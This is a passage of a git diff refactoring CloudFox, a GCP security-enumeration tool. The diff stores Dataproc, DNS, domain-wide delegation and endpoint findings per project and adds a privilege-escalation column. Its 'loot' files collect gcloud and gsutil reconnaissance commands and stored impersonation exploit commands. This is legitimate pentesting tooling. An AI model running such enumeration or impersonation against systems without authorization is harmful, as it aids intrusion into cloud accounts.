IPs)", - len(m.Clusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) + len(allClusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *DataprocModule) getAllClusters() []dataprocservice.ClusterInfo { + var all []dataprocservice.ClusterInfo + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + func (m *DataprocModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating Dataproc in project: %s", projectID), globals.GCP_DATAPROC_MODULE_NAME) @@ -98,22 +110,30 @@ func (m *DataprocModule) processProject(ctx context.Context, projectID string, l } m.mu.Lock() - m.Clusters = append(m.Clusters, clusters...) + m.ProjectClusters[projectID] = clusters + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dataproc-commands"] = &internal.LootFile{ + Name: "dataproc-commands", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n\n", + } + } + for _, cluster := range clusters { - m.addToLoot(cluster) + m.addToLoot(projectID, cluster) } m.mu.Unlock() } -func (m *DataprocModule) initializeLootFiles() { - m.LootMap["dataproc-commands"] = &internal.LootFile{ - Name: "dataproc-commands", - Contents: "# Dataproc Commands\n# Generated by CloudFox\n\n", +func (m *DataprocModule) addToLoot(projectID string, cluster dataprocservice.ClusterInfo) { + lootFile := m.LootMap[projectID]["dataproc-commands"] + if lootFile == nil { + return } -} -func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { - m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s (%s)\n"+ "# Project: %s\n", cluster.Name, cluster.Region, @@ -121,7 +141,7 @@ func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { ) // gcloud commands - m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n", cluster.Name, cluster.Region, cluster.ProjectID, @@ -130,24 +150,31 @@ func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { // Bucket commands if cluster.ConfigBucket != "" { - m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gsutil ls gs://%s/\n", cluster.ConfigBucket, ) } if cluster.TempBucket != "" { - m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gsutil ls gs://%s/\n", cluster.TempBucket, ) } - m.LootMap["dataproc-commands"].Contents += "\n" + lootFile.Contents += "\n" } func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Single table with one row per IAM binding - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataprocModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -157,19 +184,32 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger "Master Instances", "Workers", "Service Account", + "Priv Esc", "Public IPs", "Kerberos", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", } +} +func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterInfo) [][]string { var body [][]string - for _, cluster := range m.Clusters { + for _, cluster := range clusters { sa := cluster.ServiceAccount if sa == "" { sa = "(default)" } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if sa != "(default)" && sa != "" { + privEsc = m.PrivescCache.GetPrivescSummary(sa) + } else { + privEsc = "No" + } + } + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) @@ -192,6 +232,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger masterInstances, workerConfig, sa, + privEsc, boolToYesNo(!cluster.InternalIPOnly), boolToYesNo(cluster.KerberosEnabled), binding.Role, @@ -210,6 +251,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger masterInstances, workerConfig, sa, + privEsc, boolToYesNo(!cluster.InternalIPOnly), boolToYesNo(cluster.KerberosEnabled), "-", @@ -217,13 +259,51 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger }) } } + return body +} + +func (m *DataprocModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, clusters := range m.ProjectClusters { + body := m.clustersToTableBody(clusters) + tableFiles := []internal.TableFile{{Name: "dataproc-clusters", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DataprocOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} - tables := []internal.TableFile{{Name: "dataproc-clusters", Header: header, Body: body}} +func (m *DataprocModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + body := m.clustersToTableBody(allClusters) + + tables := []internal.TableFile{{Name: "dataproc-clusters", Header: m.getTableHeader(), Body: body}} var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index d2b53bdb..f19406d5 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -47,11 +47,11 @@ Attack Surface: type DNSModule struct { gcpinternal.BaseGCPModule - Zones []DNSService.ZoneInfo - Records []DNSService.RecordInfo - TakeoverRisks []DNSService.TakeoverRisk - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectZones map[string][]DNSService.ZoneInfo // projectID -> zones + ProjectRecords map[string][]DNSService.RecordInfo // projectID -> records + TakeoverRisks []DNSService.TakeoverRisk // kept global for summary + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -75,14 +75,13 @@ func runGCPDNSCommand(cmd *cobra.Command, args []string) { } module := &DNSModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Zones: []DNSService.ZoneInfo{}, - Records: []DNSService.RecordInfo{}, - TakeoverRisks: []DNSService.TakeoverRisk{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectZones: make(map[string][]DNSService.ZoneInfo), + ProjectRecords: make(map[string][]DNSService.RecordInfo), + TakeoverRisks: []DNSService.TakeoverRisk{}, + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -92,7 +91,10 @@ func runGCPDNSCommand(cmd *cobra.Command, args []string) { func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DNS_MODULE_NAME, m.processProject) - if len(m.Zones) == 0 { + allZones := m.getAllZones() + allRecords := m.getAllRecords() + + if len(allZones) == 0 { logger.InfoM("No DNS zones found", globals.GCP_DNS_MODULE_NAME) return } @@ -103,7 +105,7 @@ func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { transferModeCount := 0 dnssecOffCount := 0 - for _, zone := range m.Zones { + for _, zone := range allZones { if zone.Visibility == "public" { publicCount++ // Check DNSSEC status for public zones @@ -119,9 +121,9 @@ func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { // Check for subdomain takeover risks ds := DNSService.New() - m.TakeoverRisks = ds.CheckTakeoverRisks(m.Records) + m.TakeoverRisks = ds.CheckTakeoverRisks(allRecords) - msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(m.Zones), len(m.Records)) + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(allZones), len(allRecords)) if publicCount > 0 { msg += fmt.Sprintf(" [%d public]", publicCount) } @@ -144,6 +146,24 @@ func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllZones returns all zones from all projects +func (m *DNSModule) getAllZones() []DNSService.ZoneInfo { + var all []DNSService.ZoneInfo + for _, zones := range m.ProjectZones { + all = append(all, zones...) + } + return all +} + +// getAllRecords returns all records from all projects +func (m *DNSModule) getAllRecords() []DNSService.RecordInfo { + var all []DNSService.RecordInfo + for _, records := range m.ProjectRecords { + all = append(all, records...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -163,11 +183,20 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger return } + var projectRecords []DNSService.RecordInfo + m.mu.Lock() - m.Zones = append(m.Zones, zones...) + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dns-commands"] = &internal.LootFile{ + Name: "dns-commands", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n\n", + } + } for _, zone := range zones { - m.addZoneToLoot(zone) + m.addZoneToLoot(projectID, zone) // Get records for each zone records, err := ds.Records(projectID, zone.Name) @@ -178,11 +207,11 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger continue } - m.Records = append(m.Records, records...) - for _, record := range records { - m.addRecordToLoot(record, zone) - } + projectRecords = append(projectRecords, records...) } + + m.ProjectZones[projectID] = zones + m.ProjectRecords[projectID] = projectRecords m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -193,15 +222,13 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger // ------------------------------ // Loot File Management // ------------------------------ -func (m *DNSModule) initializeLootFiles() { - m.LootMap["dns-commands"] = &internal.LootFile{ - Name: "dns-commands", - Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n\n", +func (m *DNSModule) addZoneToLoot(projectID string, zone DNSService.ZoneInfo) { + lootFile := m.LootMap[projectID]["dns-commands"] + if lootFile == nil { + return } -} -func (m *DNSModule) addZoneToLoot(zone DNSService.ZoneInfo) { - m.LootMap["dns-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s (%s)\n"+ "# Project: %s | Visibility: %s\n", zone.Name, zone.DNSName, @@ -209,26 +236,30 @@ func (m *DNSModule) addZoneToLoot(zone DNSService.ZoneInfo) { ) // gcloud commands - m.LootMap["dns-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gcloud dns managed-zones describe %s --project=%s\n"+ "gcloud dns record-sets list --zone=%s --project=%s\n", zone.Name, zone.ProjectID, zone.Name, zone.ProjectID, ) - m.LootMap["dns-commands"].Contents += "\n" -} - -func (m *DNSModule) addRecordToLoot(record DNSService.RecordInfo, zone DNSService.ZoneInfo) { - // Records are displayed in the table, no separate loot needed + lootFile.Contents += "\n" } // ------------------------------ // Output Generation // ------------------------------ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Zones table with IAM bindings (one row per IAM binding) - zonesHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getZonesHeader returns the header for the zones table +func (m *DNSModule) getZonesHeader() []string { + return []string{ "Project Name", "Project ID", "Zone Name", @@ -238,19 +269,32 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { "Security", "Networks/Peering", "Forwarding", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", } +} - var zonesBody [][]string - for _, zone := range m.Zones { - // Format DNSSEC +// getRecordsHeader returns the header for the records table +func (m *DNSModule) getRecordsHeader() []string { + return []string{ + "Zone", + "Name", + "Type", + "TTL", + "Data", + "Takeover Risk", + } +} + +// zonesToTableBody converts zones to table body rows +func (m *DNSModule) zonesToTableBody(zones []DNSService.ZoneInfo) [][]string { + var body [][]string + for _, zone := range zones { dnssec := zone.DNSSECState if dnssec == "" { dnssec = "off" } - // Format security status security := "-" if zone.Visibility == "public" { if zone.DNSSECState == "" || zone.DNSSECState == "off" { @@ -262,7 +306,6 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { } } - // Format networks/peering networkInfo := "-" if len(zone.PrivateNetworks) > 0 { networkInfo = strings.Join(zone.PrivateNetworks, ", ") @@ -273,130 +316,163 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { } } - // Format forwarding forwarding := "-" if len(zone.ForwardingTargets) > 0 { forwarding = strings.Join(zone.ForwardingTargets, ", ") } - // If zone has IAM bindings, create one row per binding if len(zone.IAMBindings) > 0 { for _, binding := range zone.IAMBindings { - zonesBody = append(zonesBody, []string{ - m.GetProjectName(zone.ProjectID), - zone.ProjectID, - zone.Name, - zone.DNSName, - zone.Visibility, - dnssec, - security, - networkInfo, - forwarding, - binding.Role, - binding.Member, + body = append(body, []string{ + m.GetProjectName(zone.ProjectID), zone.ProjectID, zone.Name, zone.DNSName, + zone.Visibility, dnssec, security, networkInfo, forwarding, binding.Role, binding.Member, }) } } else { - // Zone has no IAM bindings - single row - zonesBody = append(zonesBody, []string{ - m.GetProjectName(zone.ProjectID), - zone.ProjectID, - zone.Name, - zone.DNSName, - zone.Visibility, - dnssec, - security, - networkInfo, - forwarding, - "-", - "-", + body = append(body, []string{ + m.GetProjectName(zone.ProjectID), zone.ProjectID, zone.Name, zone.DNSName, + zone.Visibility, dnssec, security, networkInfo, forwarding, "-", "-", }) } } + return body +} - // Records table (interesting types only, with takeover risk column) - recordsHeader := []string{ - "Zone", - "Name", - "Type", - "TTL", - "Data", - "Takeover Risk", - } - - // Build a map of takeover risks by record name for quick lookup +// recordsToTableBody converts records to table body rows +func (m *DNSModule) recordsToTableBody(records []DNSService.RecordInfo) [][]string { takeoverRiskMap := make(map[string]DNSService.TakeoverRisk) for _, risk := range m.TakeoverRisks { takeoverRiskMap[risk.RecordName] = risk - - // Add to loot file - m.LootMap["dns-commands"].Contents += fmt.Sprintf( - "# [TAKEOVER RISK] %s -> %s (%s)\n"+ - "# Risk: %s - %s\n"+ - "# Verify with:\n%s\n\n", - risk.RecordName, risk.Target, risk.Service, - risk.RiskLevel, risk.Description, - risk.Verification, - ) } - var recordsBody [][]string + var body [][]string interestingTypes := map[string]bool{"A": true, "AAAA": true, "CNAME": true, "MX": true, "TXT": true, "SRV": true} - for _, record := range m.Records { + for _, record := range records { if !interestingTypes[record.Type] { continue } - // Format data - no truncation data := strings.Join(record.RRDatas, ", ") - - // Check for takeover risk takeoverRisk := "-" if risk, exists := takeoverRiskMap[record.Name]; exists { takeoverRisk = fmt.Sprintf("%s (%s)", risk.RiskLevel, risk.Service) } - recordsBody = append(recordsBody, []string{ - record.ZoneName, - record.Name, - record.Type, - fmt.Sprintf("%d", record.TTL), - data, - takeoverRisk, + body = append(body, []string{ + record.ZoneName, record.Name, record.Type, fmt.Sprintf("%d", record.TTL), data, takeoverRisk, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) +// buildTablesForProject builds table files for a single project +func (m *DNSModule) buildTablesForProject(projectID string) []internal.TableFile { + zones := m.ProjectZones[projectID] + records := m.ProjectRecords[projectID] + + zonesBody := m.zonesToTableBody(zones) + recordsBody := m.recordsToTableBody(records) + + var tableFiles []internal.TableFile + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: m.getZonesHeader(), + Body: zonesBody, + }) + } + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: m.getRecordsHeader(), + Body: recordsBody, + }) + } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *DNSModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectZones { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectRecords { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = DNSOutput{Table: tableFiles, Loot: lootFiles} } - // Build table files - tableFiles := []internal.TableFile{} + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *DNSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allZones := m.getAllZones() + allRecords := m.getAllRecords() + + zonesBody := m.zonesToTableBody(allZones) + recordsBody := m.recordsToTableBody(allRecords) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + var tableFiles []internal.TableFile if len(zonesBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_DNS_MODULE_NAME + "-zones", - Header: zonesHeader, + Header: m.getZonesHeader(), Body: zonesBody, }) } - if len(recordsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_DNS_MODULE_NAME + "-records", - Header: recordsHeader, + Header: m.getRecordsHeader(), Body: recordsBody, }) } - output := DNSOutput{ - Table: tableFiles, - Loot: lootFiles, - } + output := DNSOutput{Table: tableFiles, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go index 98dcef43..f98ebab4 100644 --- a/gcp/commands/domainwidedelegation.go +++ b/gcp/commands/domainwidedelegation.go @@ -51,9 +51,9 @@ Note: Scopes must be authorized in Admin Console > Security > API Controls`, type DomainWideDelegationModule struct { gcpinternal.BaseGCPModule - DWDAccounts []domainwidedelegationservice.DWDServiceAccount - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectDWDAccounts map[string][]domainwidedelegationservice.DWDServiceAccount // projectID -> accounts + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -77,22 +77,30 @@ func runGCPDomainWideDelegationCommand(cmd *cobra.Command, args []string) { } module := &DomainWideDelegationModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - DWDAccounts: []domainwidedelegationservice.DWDServiceAccount{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectDWDAccounts: make(map[string][]domainwidedelegationservice.DWDServiceAccount), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } // ------------------------------ // Module Execution // ------------------------------ +func (m *DomainWideDelegationModule) getAllDWDAccounts() []domainwidedelegationservice.DWDServiceAccount { + var all []domainwidedelegationservice.DWDServiceAccount + for _, accounts := range m.ProjectDWDAccounts { + all = append(all, accounts...) + } + return all +} + func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, m.processProject) - if len(m.DWDAccounts) == 0 { + allAccounts := m.getAllDWDAccounts() + if len(allAccounts) == 0 { logger.InfoM("No Domain-Wide Delegation service accounts found", globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) return } @@ -100,7 +108,7 @@ func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger interna // Count confirmed DWD accounts confirmedDWD := 0 criticalCount := 0 - for _, account := range m.DWDAccounts { + for _, account := range allAccounts { if account.DWDEnabled { confirmedDWD++ } @@ -109,7 +117,7 @@ func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger interna } } - logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(m.DWDAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(allAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) if criticalCount > 0 { logger.InfoM(fmt.Sprintf("[CRITICAL] %d DWD accounts with keys - can impersonate Workspace users!", criticalCount), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) @@ -126,6 +134,17 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project logger.InfoM(fmt.Sprintf("Checking DWD service accounts in project: %s", projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dwd-commands"] = &internal.LootFile{ + Name: "dwd-commands", + Contents: "# Domain-Wide Delegation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + svc := domainwidedelegationservice.New() accounts, err := svc.GetDWDServiceAccounts(projectID) if err != nil { @@ -136,10 +155,10 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project } m.mu.Lock() - m.DWDAccounts = append(m.DWDAccounts, accounts...) + m.ProjectDWDAccounts[projectID] = accounts for _, account := range accounts { - m.addAccountToLoot(account) + m.addAccountToLoot(projectID, account) } m.mu.Unlock() @@ -151,17 +170,15 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project // ------------------------------ // Loot File Management // ------------------------------ -func (m *DomainWideDelegationModule) initializeLootFiles() { - m.LootMap["dwd-commands"] = &internal.LootFile{ - Name: "dwd-commands", - Contents: "# Domain-Wide Delegation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *DomainWideDelegationModule) addAccountToLoot(projectID string, account domainwidedelegationservice.DWDServiceAccount) { + lootFile := m.LootMap[projectID]["dwd-commands"] + if lootFile == nil { + return } -} -func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegationservice.DWDServiceAccount) { // Add exploit commands for each account if len(account.ExploitCommands) > 0 { - m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Service Account: %s (Project: %s)\n"+ "# DWD Enabled: %v\n"+ "# OAuth2 Client ID: %s\n"+ @@ -173,16 +190,16 @@ func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegati ) // List key details for _, key := range account.Keys { - m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# - Key ID: %s (Created: %s, Expires: %s, Algorithm: %s)\n", key.KeyID, key.CreatedAt, key.ExpiresAt, key.KeyAlgorithm, ) } - m.LootMap["dwd-commands"].Contents += "\n" + lootFile.Contents += "\n" for _, cmd := range account.ExploitCommands { - m.LootMap["dwd-commands"].Contents += cmd + "\n" + lootFile.Contents += cmd + "\n" } - m.LootMap["dwd-commands"].Contents += "\n" + lootFile.Contents += "\n" } } @@ -190,8 +207,15 @@ func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegati // Output Generation // ------------------------------ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main table - one row per key (or one row if no keys) - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DomainWideDelegationModule) getHeader() []string { + return []string{ "Project ID", "Project Name", "Email", @@ -202,9 +226,11 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int "Key Expires", "Key Algorithm", } +} +func (m *DomainWideDelegationModule) accountsToTableBody(accounts []domainwidedelegationservice.DWDServiceAccount) [][]string { var body [][]string - for _, account := range m.DWDAccounts { + for _, account := range accounts { dwdStatus := "No" if account.DWDEnabled { dwdStatus = "Yes" @@ -245,21 +271,72 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int }) } } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *DomainWideDelegationModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if accounts, ok := m.ProjectDWDAccounts[projectID]; ok && len(accounts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "domain-wide-delegation", + Header: m.getHeader(), + Body: m.accountsToTableBody(accounts), + }) + } + + return tableFiles +} + +func (m *DomainWideDelegationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectDWDAccounts { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = DomainWideDelegationOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) } +} + +func (m *DomainWideDelegationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allAccounts := m.getAllDWDAccounts() + + var tables []internal.TableFile - tables := []internal.TableFile{ - { + if len(allAccounts) > 0 { + tables = append(tables, internal.TableFile{ Name: "domain-wide-delegation", - Header: header, - Body: body, - }, + Header: m.getHeader(), + Body: m.accountsToTableBody(allAccounts), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } output := DomainWideDelegationOutput{ diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index c203878e..2dc42af3 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -84,9 +84,9 @@ type Endpoint struct { type EndpointsModule struct { gcpinternal.BaseGCPModule - Endpoints []Endpoint - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectEndpoints map[string][]Endpoint // projectID -> endpoints + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex // Firewall rule mapping: "network:tag1,tag2" -> allowed ports firewallPortMap map[string][]string @@ -113,23 +113,31 @@ func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { } module := &EndpointsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Endpoints: []Endpoint{}, - LootMap: make(map[string]*internal.LootFile), - firewallPortMap: make(map[string][]string), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEndpoints: make(map[string][]Endpoint), + LootMap: make(map[string]map[string]*internal.LootFile), + firewallPortMap: make(map[string][]string), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } // ------------------------------ // Module Execution // ------------------------------ +func (m *EndpointsModule) getAllEndpoints() []Endpoint { + var all []Endpoint + for _, endpoints := range m.ProjectEndpoints { + all = append(all, endpoints...) + } + return all +} + func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) - if len(m.Endpoints) == 0 { + 